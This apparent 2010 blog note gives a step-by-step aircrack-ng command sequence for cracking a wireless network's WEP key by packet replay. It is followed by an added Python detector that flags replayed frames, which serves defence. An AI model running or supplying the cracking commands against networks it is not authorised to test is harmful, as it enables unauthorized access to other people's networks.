Wednesday, November 03, 2010

Aircrack Quick Tutorial (Wireless WEP Cracking)

Speaking of wireless. The following is just a quick note-to-self, because I always forget the exact commands and end up crawling around the Aircrack wiki for a bit. I thought I'd posted this before, but I can't seem to find it.

TTY1$ sudo airmon-ng start eth1
# Assume monitor started on mon0.
TTY1$ sudo airodump-ng mon0
# Scout interesting APs and focus:
TTY1$ sudo airodump-ng --channel X --bssid XX:XX:XX:XX:XX:XX -w output mon0
# OK, this terminal is dumping data. Open a new one.

TTY2$ sudo aireplay-ng -1 0 -a XX:XX:XX:XX:XX:XX mon0
# ... Association successful :-)

# Now start the attack. I like opening a new terminal for this.
# Don't bother with the ARP request replay attack.
# The best method to use is the -p 0841 one, especially when using
# a crappy wifi chip like mine (3945ABG). Last time I checked, the
# advanced attack methods (KoreK chopchop, fragmentation, caffe-latte
# and Hirte) didn't work.
TTY3$ sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b XX:XX:XX:XX:XX:XX mon0

# Wait until a packet is captured. It's best to use a small one (Size: 68).
# Reinject it, and the data counter in TTY1 (airodump) should go up. Now get cracking:
TTY4$ sudo aircrack-ng -b XX:XX:XX:XX:XX:XX output*.cap

# And, optionally:
TTY5$ sudo aircrack-ng -K -b XX:XX:XX:XX:XX:XX output*.cap
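As an added defender-side example (not part of the original post): the -p 0841 replay above works by re-sending one captured data frame over and over, so a wireless monitor sees the same transmitter, WEP IV and frame length repeat at a rate that normal traffic never reaches. The record format and the sample frames below are constructed for this example.

```python
from collections import defaultdict

# Constructed sample frames: (timestamp_s, transmitter, iv_hex, length).
# A normal client rotates its 24-bit IV on every frame ...
NORMAL = [(0.1 * i, "02:00:00:00:00:01", f"{0x100000 + i:06x}", 120 + (i % 5))
          for i in range(30)]
# ... and an occasional 802.11 retransmit repeats one frame a couple of times.
RETRANSMIT = [(3.00, "02:00:00:00:00:01", "100005", 120),
              (3.05, "02:00:00:00:00:01", "100005", 120)]
# The injected stream is one 68-byte frame replayed 40 times in ~2 seconds.
INJECTED = [(1.0 + 0.05 * i, "02:00:00:00:00:02", "3a2b1c", 68) for i in range(40)]
SAMPLE_FRAMES = NORMAL + RETRANSMIT + INJECTED


def find_replayed_frames(frames, threshold=20, window_s=5.0):
    """Group frames by (transmitter, IV, length) and report every group in
    which at least `threshold` copies fall inside a `window_s`-second window.

    Returns a list of (transmitter, iv_hex, length, total_count) tuples.
    Genuine retransmits repeat a frame two or three times; an injector
    repeats it hundreds of times, so a tight cluster is the signal.
    """
    seen = defaultdict(list)
    for ts, ta, iv, length in frames:
        seen[(ta, iv, length)].append(ts)
    alerts = []
    for key, times in seen.items():
        times.sort()
        # Slide a window of `threshold` frames along the sorted timestamps.
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window_s:
                alerts.append(key + (len(times),))
                break
    return alerts


if __name__ == "__main__":
    for ta, iv, length, count in find_replayed_frames(SAMPLE_FRAMES):
        print(f"replay suspected: {ta} IV {iv} len {length} x{count}")
```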